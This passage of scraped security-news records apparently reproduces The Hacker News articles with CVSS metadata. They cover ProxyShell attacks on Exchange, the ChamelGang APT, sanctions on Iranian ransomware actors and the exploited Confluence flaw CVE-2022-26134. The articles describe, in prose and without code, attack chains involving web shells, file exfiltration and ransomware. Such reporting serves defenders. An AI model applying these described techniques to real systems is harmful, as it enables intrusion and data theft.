\"**ProxyShell**\" Microsoft Exchange vulnerabilities that were patched earlier this May, including deploying LockFile ransomware on compromised systems.\n\nTracked as CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207, the vulnerabilities enable adversaries to bypass ACL controls, elevate privileges on the Exchange PowerShell backend, effectively permitting the attacker to perform unauthenticated, remote code execution. While the former two were addressed by Microsoft on April 13, a patch for CVE-2021-31207 was shipped as part of the Windows maker's May Patch Tuesday updates.\n\n\"An attacker exploiting these vulnerabilities could execute arbitrary code on a vulnerable machine,\" CISA [said](<https://us-cert.cisa.gov/ncas/current-activity/2021/08/21/urgent-protect-against-active-exploitation-proxyshell>).\n\nThe development comes a little over a week after cybersecurity researchers sounded the alarm on [opportunistic scanning and exploitation](<https://thehackernews.com/2021/08/hackers-actively-searching-for.html>) of unpatched Exchange servers by taking advantage of the ProxyShell attack chain.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEi9pcvxkZCqcBcriArdPtNn0AWuIafJEeUPlEHsu4z-oKwZf3gzsprTbCyyBAmMBzU-gFoDqTD8zWP4vrlEdDv_w5I3I5iSFyAS8RZ2p_jjRO0sOXbKoN31TMsPPfb0BXXZt8m7aM2SAtTFrkZ3hdSN1FSLaynBoGiYDkl78s_i0T5Kva4eudH21Jzf>) \n--- \nImage Source: [Huntress Labs](<https://www.huntress.com/blog/rapid-response-microsoft-exchange-servers-still-vulnerable-to-proxyshell-exploit>) \n \nOriginally demonstrated at the [Pwn2Own hacking contest](<https://thehackernews.com/2021/04/windows-ubuntu-zoom-safari-ms-exchange.html>) in April this year, ProxyShell is part of a broader trio of exploit chains discovered by DEVCORE security researcher Orange Tsai that includes ProxyLogon and ProxyOracle, the latter of which concerns two remote code execution flaws that could be employed to recover a user's password in plaintext format.\n\n\"They're backdooring boxes with webshells that drop other webshells and also executables that periodically call out,\" researcher Kevin Beaumont [noted](<https://twitter.com/GossiTheDog/status/1425844380376735746>) last week.\n\nNow according to researchers from Huntress Labs, at least [five distinct styles of web shells](<https://www.huntress.com/blog/rapid-response-microsoft-exchange-servers-still-vulnerable-to-proxyshell-exploit>) have been observed as deployed to vulnerable Microsoft Exchange servers, with over over 100 incidents reported related to the exploit between August 17 and 18. Web shells grant the attackers remote access to the compromised servers, but it isn't clear exactly what the goals are or the extent to which all the flaws were used.\n\nMore than 140 web shells have been detected across no fewer than 1,900 unpatched Exchanger servers to date, Huntress Labs CEO Kyle Hanslovan [tweeted](<https://twitter.com/KyleHanslovan/status/1428804893423382532>), adding \"impacted [organizations] thus far include building manufacturing, seafood processors, industrial machinery, auto repair shops, a small residential airport and more.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-22T09:51:00", "type": "thn", "title": "WARNING: Microsoft Exchange Under Attack With ProxyShell Flaws", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-23T13:28:25", "id": "THN:5BE77895D84D1FB816C73BB1661CE8EB", "href": "https://thehackernews.com/2021/08/microsoft-exchange-under-attack-with.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:14", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEiQk7skJEo49QfN4ESusan9jBZfTXapDKpnR6CXuJbaNKUBpx7nO684Vj5RRctI8hh09KwyntDYPyeQI-HbWC03E5Uo4ABDXXj3vfb774Dv1G65e03iX30VM0pcCe5hQfxnkW-u1V4gZgZ3L2et_QXqceUwFJfPQDg8aUOWSagSt-l0OGRquNTiLEso>)\n\nA previously undocumented threat actor has been identified as behind a string of attacks targeting fuel, energy, and aviation production industries in Russia, the U.S., India, Nepal, Taiwan, and Japan with the goal of stealing data from compromised networks.\n\nCybersecurity company Positive Technologies dubbed the advanced persistent threat (APT) group ChamelGang \u2014 referring to their chameleellonic capabilities, including disguising \"its malware and network infrastructure under legitimate services of Microsoft, TrendMicro, McAfee, IBM, and Google.\" \n\n\"To achieve their goal, the attackers used a trending penetration method\u2014supply chain,\" the researchers [said](<https://www.ptsecurity.com/ww-en/about/news/positive-technologies-uncovers-new-apt-group-attacking-russia-s-fuel-and-energy-complex-and-aviation-production-industry/>) of one of the incidents investigated by the firm. \"The group compromised a subsidiary and penetrated the target company's network through it. Trusted relationship attacks are rare today due to the complexity of their execution. Using this method [\u2026], the ChamelGang group was able to achieve its goal and steal data from the compromised network.\"\n\nIntrusions mounted by the adversary are believed to have commenced at the end of March 2021, with later attacks in August leveraging what's called the [ProxyShell](<https://thehackernews.com/2021/08/hackers-actively-searching-for.html>) chain of vulnerabilities affecting Microsoft Exchange Servers, the technical details of which were first revealed at the Black Hat USA 2021 security conference earlier that month.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgpU90FEVyvHUv6m3vUITmIj4tJ_Kexp6cw5No4dV8_Po339DpYJtWa0Z-_BTv7hBE9_EkkSjRVlbP2lsM6MxD-x1p1yD_mQOhRoeiBy9vjPZXWBKrrJlJlvEbl4QdL8woMTd4XIY2ZGusd5N0uFaCwXBUiwFnJnXGfU0C-ESawdO8FR9OB4njoQ6oc>)\n\nThe attack in March is also notable for the fact that the operators breached a subsidiary organization to gain access to an unnamed energy company's network by exploiting a flaw in Red Hat JBoss Enterprise Application ([CVE-2017-12149](<https://access.redhat.com/security/cve/CVE-2017-12149>)) to remotely execute commands on the host and deploy malicious payloads that enable the actor to launch the malware with elevated privileges, laterally pivot across the network, and perform reconnaissance, before deploying a backdoor called DoorMe.\n\n\"The infected hosts were controlled by the attackers using the public utility FRP (fast reverse proxy), written in Golang,\" the researchers said. \"This utility allows connecting to a reverse proxy server. The attackers' requests were routed using the socks5 plugin through the server address obtained from the configuration data.\"\n\nOn the other hand, the August attack against a Russian company in the aviation production sector involved the exploitation of ProxyShell flaws (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207) to drop additional web shells and conduct remote reconnaissance on the compromised node, ultimately leading to the installation of a modified version of the DoorMe implant that comes with expanded capabilities to run arbitrary commands and carry out file operations.\n\n\"Targeting the fuel and energy complex and aviation industry in Russia isn't unique \u2014 this sector is one of the three most frequently attacked,\" Positive Technologies' Head of Threat Analysis, Denis Kuvshinov, said. \"However, the consequences are serious: Most often such attacks lead to financial or data loss\u2014in 84% of all cases last year, the attacks were specifically created to steal data, and that causes major financial and reputational damage.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-04T12:48:00", "type": "thn", "title": "A New APT Hacking Group Targeting Fuel, Energy, and Aviation Industries", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12149", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-10-04T12:48:16", "id": "THN:E95B6A75073DA71CEC73B2E4F0B13622", "href": "https://thehackernews.com/2021/10/a-new-apt-hacking-group-targeting-fuel.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-16T04:03:41", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjUqmffIx48KtQdHxTXb4TQfvElel4yvoLc_Uq-nF3atp_DnKXEvX_r4s4FR-V9kItxokvkUgH3L-QP1uH3JrII_VtRNnXYXU3EYxwsreIbOgCkHKHN4AbWxtUPY5tKaH8u6YvYBd2oA_JReHSU1gNdaKY11tzzrlCHhUSTJzZr4yGRgnN-fUCAb2Mv/s728-e100/iranian-hackers.jpg>)\n\nThe U.S. Treasury Department's Office of Foreign Assets Control (OFAC) on Wednesday announced sweeping sanctions against ten individuals and two entities backed by Iran's Islamic Revolutionary Guard Corps (IRGC) for their involvement in ransomware attacks at least since October 2020.\n\nThe agency said the cyber activity mounted by the individuals is partially attributable to intrusion sets tracked under the names APT35, Charming Kitten, Nemesis Kitten, Phosphorus, and TunnelVision.\n\n\"This group has launched extensive campaigns against organizations and officials across the globe, particularly targeting U.S. and Middle Eastern defense, diplomatic, and government personnel, as well as private industries including media, energy, business services, and telecommunications,\" the Treasury [said](<https://home.treasury.gov/news/press-releases/jy0948>).\n\nThe Nemesis Kitten actor, which is also known as [Cobalt Mirage](<https://thehackernews.com/2022/05/iranian-hackers-leveraging-bitlocker.html>), [DEV-0270](<https://thehackernews.com/2022/09/microsoft-warns-of-ransomware-attacks.html>), and [UNC2448](<https://thehackernews.com/2022/09/iranian-apt42-launched-over-30.html>), has come under the scanner in recent months for its pattern of ransomware attacks for opportunistic revenue generation using Microsoft's built-in BitLocker tool to encrypt files on compromised devices.\n\nMicrosoft and Secureworks have characterized DEV-0270 as a subgroup of [Phosphorus](<https://thehackernews.com/2022/09/iranian-hackers-target-high-value.html>) (aka Cobalt Illusion), with ties to another actor referred to as [TunnelVision](<https://thehackernews.com/2022/02/iranian-hackers-targeting-vmware.html>). The Windows maker also assessed with low confidence that \"some of DEV-0270's ransomware attacks are a form of moonlighting for personal or company-specific revenue generation.\"\n\nWhat's more, independent analyses from the two cybersecurity firms as well as Google-owned [Mandiant](<https://thehackernews.com/2022/09/iranian-apt42-launched-over-30.html>) has revealed the group's connections to two companies Najee Technology (which functions under the aliases Secnerd and Lifeweb) and Afkar System, both of which have been subjected to U.S. sanctions.\n\nIt's worth noting that Najee Technology and Afkar System's connections to the Iranian intelligence agency were first flagged by an anonymous anti-Iranian regime entity called [Lab Dookhtegan](<https://thehackernews.com/2021/05/researchers-uncover-iranian-state.html>) [earlier](<https://mobile.twitter.com/LabDookhtegan2/status/1520355269695442945>) this [year](<https://mobile.twitter.com/LabDookhtegan2/status/1539960629867401218>).\n\n\"The model of Iranian government intelligence functions using contractors blurs the lines between the actions tasked by the government and the actions that the private company takes on its own initiative,\" Secureworks said in a [new report](<https://www.secureworks.com/blog/opsec-mistakes-reveal-cobalt-mirage-threat-actors>) detailing the activities of Cobalt Mirage.\n\nWhile exact links between the two companies and IRGC remain unclear, the method of private Iranian firms acting as fronts or providing support for intelligence operations is well established over the years, including that of [ITSecTeam (ITSEC), Mersad](<https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged>), [Emennet Pasargad](<https://thehackernews.com/2021/11/us-charged-2-iranians-hackers-for.html>), and [Rana Intelligence Computing Company](<https://thehackernews.com/2020/09/iranian-hackers-sanctioned.html>).\n\nOn top of that, the Secureworks probe into a June 2022 Cobalt Mirage incident showed that a PDF file containing the ransom note was created on December 17, 2021, by an \"Ahmad Khatibi\" and timestamped at UTC+03:30 time zone, which corresponds to the Iran Standard Time. Khatibi, incidentally, happens to be the CEO and owner of the Iranian company Afkar System.\n\nAhmad Khatibi Aghda is also part of the 10 individuals sanctioned by the U.S., alongside Mansour Ahmadi, the CEO of Najee Technology, and other employees of the two enterprises who are said to be complicit in targeting various networks globally by leveraging well-known security flaws to gain initial access to further follow-on attacks.\n\nSome of the [exploited flaws](<https://www.cisa.gov/uscert/ncas/alerts/aa22-257a>), according to a [joint cybersecurity advisory](<https://www.cisa.gov/uscert/ncas/current-activity/2022/09/14/iranian-islamic-revolutionary-guard-corps-affiliated-cyber-actors>) released by Australia, Canada, the U.K., and the U.S., as part of the IRGC-affiliated actor activity are as follows -\n\n * Fortinet FortiOS path traversal vulnerability ([CVE-2018-13379](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>))\n * Fortinet FortiOS default configuration vulnerability ([CVE-2019-5591](<https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html>))\n * Fortinet FortiOS SSL VPN 2FA bypass vulnerability ([CVE-2020-12812](<https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html>))\n * [ProxyShell](<https://thehackernews.com/2021/08/hackers-actively-searching-for.html>) (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207), and\n * [Log4Shell](<https://thehackernews.com/2021/12/new-apache-log4j-update-released-to.html>) (CVE-2021-44228, CVE-2021-45046, and/or CVE-2021-45105)\n\n\"Khatibi is among the cyber actors who gained unauthorized access to victim networks to encrypt the network with BitLocker and demand a ransom for the decryption keys,\" the U.S. government said, in addition to adding him to the FBI's [Most Wanted list](<https://www.fbi.gov/wanted/cyber/ahmad-khatibi-aghda>).\n\n\"He leased network infrastructure used in furtherance of this malicious cyber group's activities, he participated in compromising victims' networks, and he engaged in ransom negotiations with victims.\"\n\nCoinciding with the sanctions, the Justice Department separately [indicted](<https://www.justice.gov/usao-nj/pr/three-iranian-nationals-charged-engaging-computer-intrusions-and-ransomware-style>) Ahmadi, Khatibi, and a third Iranian national named Amir Hossein Nickaein Ravari for engaging in a criminal extortion scheme to inflict damage and losses to victims located in the U.S., Israel, and Iran.\n\nAll three individuals have been charged with one count of conspiring to commit computer fraud and related activity in connection with computers; one count of intentionally damaging a protected computer; and one count of transmitting a demand in relation to damaging a protected computer. Ahmadi has also been charged with one more count of intentionally damaging a protected computer.\n\nThat's not all. The U.S. State Department has also [announced monetary rewards](<https://www.state.gov/sanctioning-iranians-for-malicious-cyber-acts/>) of up to $10 million for any information about [Mansour, Khatibi, and Nikaeen](<https://rewardsforjustice.net/index/?jsf=jet-engine:rewards-grid&tax=cyber:3266>) and their whereabouts.\n\n\"These defendants may have been hacking and extorting victims \u2013 including critical infrastructure providers \u2013 for their personal gain, but the charges reflect how criminals can flourish in the safe haven that the Government of Iran has created and is responsible for,\" Assistant Attorney General Matthew Olsen said.\n\nThe development comes close on the heels of [sanctions](<https://thehackernews.com/2022/09/us-imposes-new-sanctions-on-iran-over.html>) imposed by the U.S. against Iran's Ministry of Intelligence and Security (MOIS) and its Minister of Intelligence, Esmaeil Khatib, for engaging in cyber-enabled activities against the nation and its allies.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-09-15T06:49:00", "type": "thn", "title": "U.S. Charges 3 Iranian Hackers and Sanctions Several Others Over Ransomware Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-09-16T03:17:57", "id": "THN:802C6445DD27FFC7978D22CC3182AD58", "href": "https://thehackernews.com/2022/09/us-charges-3-iranian-hackers-and.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-04T09:56:20", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjB-3FGATEcQvVgoHD4SeHSMPhxak-CS-oPPNSfU5-5SkLrm94tD5D0FIxx_OoOOtXyQiGBrKcDgRUW2iNO9g17pvv2yWaxWqF27SPffdburUe_xKI1xM67MdF81s7ep1qHWagF0rFoXsRGa15bMeP_43LBSreE8ELfJybJIroA1mHu5NL3se511yT6/s728-e100/jira.jpg>)\n\nAtlassian on Friday rolled out fixes to address a [critical security flaw](<https://thehackernews.com/2022/06/hackers-exploiting-unpatched-critical.html>) affecting its Confluence Server and Data Center products that have come under active exploitation by threat actors to achieve remote code execution.\n\nTracked as [**CVE-2022-26134**](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>), the issue is similar to [**CVE-2021-26084**](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>) \u2014 another security flaw the Australian software company patched in August 2021.\n\nBoth relate to a case of Object-Graph Navigation Language ([OGNL](<https://en.wikipedia.org/wiki/OGNL>)) injection that could be exploited to achieve arbitrary code execution on a Confluence Server or Data Center instance.\n\nThe newly discovered shortcoming impacts all supported versions of Confluence Server and Data Center, with every version after 1.3.0 also affected. It's been resolved in the following versions -\n\n * 7.4.17\n * 7.13.7\n * 7.14.3\n * 7.15.2\n * 7.16.4\n * 7.17.4\n * 7.18.1\n\nAccording to stats from internet asset discovery platform [Censys](<https://censys.io/cve-2022-26134-confluenza-omicron-edition/>), there are about 9,325 services across 8,347 distinct hosts running a vulnerable version of Atlassian Confluence, with [most instances](<https://datastudio.google.com/reporting/1fbdf17c-ae37-4501-bd3f-935b72d1f181/page/2DSuC>) located in the U.S., China, Germany, Russia, and France.\n\nEvidence of active exploitation of the flaw, likely by attackers of Chinese origin, came to light after cybersecurity firm Volexity discovered the flaw over the Memorial Day weekend in the U.S. during an incident response investigation.\n\n\"The targeted industries/verticals are quite widespread,\" Steven Adair, founder and president of Volexity, [said](<https://twitter.com/stevenadair/status/1532768026818490371>) in a series of tweets. \"This is a free-for-all where the exploitation seems coordinated.\"\n\n\"It is clear that multiple threat groups and individual actors have the exploit and have been using it in different ways. Some are quite sloppy and others are a bit more stealth.\"\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA), besides [adding](<https://www.cisa.gov/uscert/ncas/current-activity/2022/06/02/cisa-adds-one-known-exploited-vulnerability-cve-2022-26134-catalog>) the zero-day bug to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), has also urged federal agencies to immediately block all internet traffic to and from the affected products and either apply the patches or remove the instances by June 6, 2022, 5 p.m. ET.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-04T08:57:00", "type": "thn", "title": "Atlassian Releases Patch for Confluence Zero-Day Flaw Exploited in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2022-26134"], "modified": "2022-06-04T08:57:38", "id": "THN:362401076AC227D49D729838DBDC2052", "href": "https://thehackernews.com/2022/06/atlassian-releases-patch-for-confluence.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-03T09:56:17", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgtFRIbOmYLbsTQsfQcmDa8dd7UbU-isTy7dToS2Gy1p7s--Zt-QgfjUpligZQwwZouhjIgGzL8kjD1QlluSfAvuZ7I7GKPJG21wA9tfWYRmChZ7jK57W-8AeMWNQDwHO9tEJkbBfs3AltDvfY7kp3Bl13jp3djDlSN_7F0g5plbOk_BGleGYX9aFNC/s728-e100/hackers.jpg>)\n\nAtlassian has warned of a critical unpatched remote code execution vulnerability impacting Confluence Server and Data Center products that it said is being actively exploited in the wild.\n\nThe Australian software company credited cybersecurity firm Volexity for identifying the flaw, which is being tracked as **CVE-2022-26134**.\n\n\"Atlassian has been made aware of current active exploitation of a critical severity unauthenticated remote code execution vulnerability in Confluence Data Center and Server,\" it [said](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) in an advisory.\n\n\"There are currently no fixed versions of Confluence Server and Data Center available. Atlassian is working with the highest priority to issue a fix.\" Specifics of the security flaw have been withheld until a software patch is available.\n\nAll supported versions of Confluence Server and Data Center are affected, although it's expected that all versions of the enterprise solution are potentially vulnerable. The earliest impacted version is yet to be ascertained.\n\nIn the absence of a fix, Atlassian is urging customers to restrict Confluence Server and Data Center instances from the internet or consider disabling the instances altogether. Alternatively, it has recommended implementing a web application firewall (WAF) rule which blocks URLs containing \"${\" to reduce the risk.\n\nVolexity, in an independent disclosure, said it detected the activity over the Memorial Day weekend in the U.S. as part of an incident response investigation.\n\nThe attack chain involved leveraging the Atlassian zero-day exploit \u2014 a command injection vulnerability \u2014 to achieve unauthenticated remote code execution on the server, enabling the threat actor to use the foothold to drop the Behinder web shell.\n\n\"[Behinder](<https://github.com/Freakboy/Behinder>) provides very powerful capabilities to attackers, including memory-only webshells and built-in support for interaction with Meterpreter and Cobalt Strike,\" the researchers [said](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>). \"At the same time, it does not allow persistence, which means a reboot or service restart will wipe it out.\"\n\nSubsequently, the web shell is said to have been employed as a conduit to deploy two additional web shells to disk, including [China Chopper](<https://www.mandiant.com/resources/the-little-malware-that-could-detecting-and-defeating-the-china-chopper-web-shell>) and a custom file upload shell to exfiltrate arbitrary files to a remote server.\n\nThe development comes less than a year after another critical remote code execution flaw in Atlassian Confluence ([CVE-2021-26084](<https://thehackernews.com/2021/09/us-cyber-command-warns-of-ongoing.html>), CVSS score: 9.8) was actively weaponized in the wild to install cryptocurrency miners on compromised servers.\n\n\"By exploiting this kind of vulnerability, attackers can gain direct access to highly sensitive systems and networks,\" Volexity said. \"Further, these systems can often be difficult to investigate, as they lack the appropriate monitoring or logging capabilities.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T03:43:00", "type": "thn", "title": "Hackers Exploiting Unpatched Critical Atlassian Confluence Zero-Day Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2022-26134"], "modified": "2022-06-03T09:27:09", "id": "THN:573D61ED9CCFF01AECC281F8913E42F8", "href": "https://thehackernews.com/2022/06/hackers-exploiting-unpatched-critical.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-18T05:57:47", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj9rIpLd7Wt8S6XBYbfSyi_LxY3hVen8bxDxWgv56ywl84WByL1Zl26yIu_oQ18uh4gvIi8vulmy9q1SZTMxCmqhEiWx0sm82_GHXfs821huyPVdY3i9HR5j_Dk6uxz27udcCKd-Tl7Z1edq42KHthx8Ln0XuGeTqNQ5nDnXn7z5jvyBqljfIiqhIVu/s728-e100/ransomware.jpg>)\n\nA recently patched [critical security flaw](<https://thehackernews.com/2022/06/hackers-exploiting-unpatched-critical.html>) in Atlassian Confluence Server and Data Center products is being actively weaponized in real-world attacks to drop cryptocurrency miners and ransomware payloads.\n\nIn at least two of the Windows-related incidents observed by cybersecurity vendor Sophos, adversaries exploited the vulnerability to deliver Cerber ransomware and a [crypto miner](<https://blog.checkpoint.com/2022/06/09/crypto-miners-leveraging-atlassian-zero-day-vulnerability/>) called z0miner on victim networks.\n\nThe bug ([CVE-2022-26134](<https://nvd.nist.gov/vuln/detail/CVE-2022-26134>), CVSS score: 9.8), which was [patched](<https://thehackernews.com/2022/06/atlassian-releases-patch-for-confluence.html>) by Atlassian on June 3, 2022, enables an unauthenticated actor to inject malicious code that paves the way of remote code execution (RCE) on affected installations of the collaboration suite. All supported versions of Confluence Server and Data Center are affected.\n\nOther notable malware pushed as part of disparate instances of attack activity include Mirai and Kinsing bot variants, a rogue package called [pwnkit](<https://thehackernews.com/2022/01/12-year-old-polkit-flaw-lets.html>), and Cobalt Strike by way of a web shell deployed after gaining an initial foothold into the compromised system.\n\n\"The vulnerability, CVE-2022-26134, allows an attacker to spawn a remotely-accessible shell, in-memory, without writing anything to the server's local storage,\" Andrew Brandt, principal security researcher at Sophos, [said](<https://news.sophos.com/en-us/2022/06/16/confluence-exploits-used-to-drop-ransomware-on-vulnerable-servers/>).\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj4ylTTjRkYLtYQCSXoVz8gUgRgTa98lR7XaqcG9UbybTcDEi9J5hfotnq_Gutzoj81P5XHccmBjiW9E7KZlw5edBNyVl0N0zwIwuyQGM4A95z1ZdyCtPLIHlvFzE_XXxyZJjC55Sp3sPQrsczwhlKexPSQGqBrt0qHXhWsFMoMEcBZXvs-OTYPTLet/s728-e100/code.jpg>)\n\nThe disclosure overlaps with similar warnings from Microsoft, which [revealed](<https://twitter.com/MsftSecIntel/status/1535417776290111489>) last week that \"multiple adversaries and nation-state actors, including [DEV-0401](<https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/#DEV-0401>) and DEV-0234, are taking advantage of the Atlassian Confluence RCE vulnerability CVE-2022-26134.\"\n\nDEV-0401, described by Microsoft as a \"China-based lone wolf turned LockBit 2.0 affiliate,\" has also been previously linked to ransomware deployments targeting internet-facing systems running VMWare Horizon 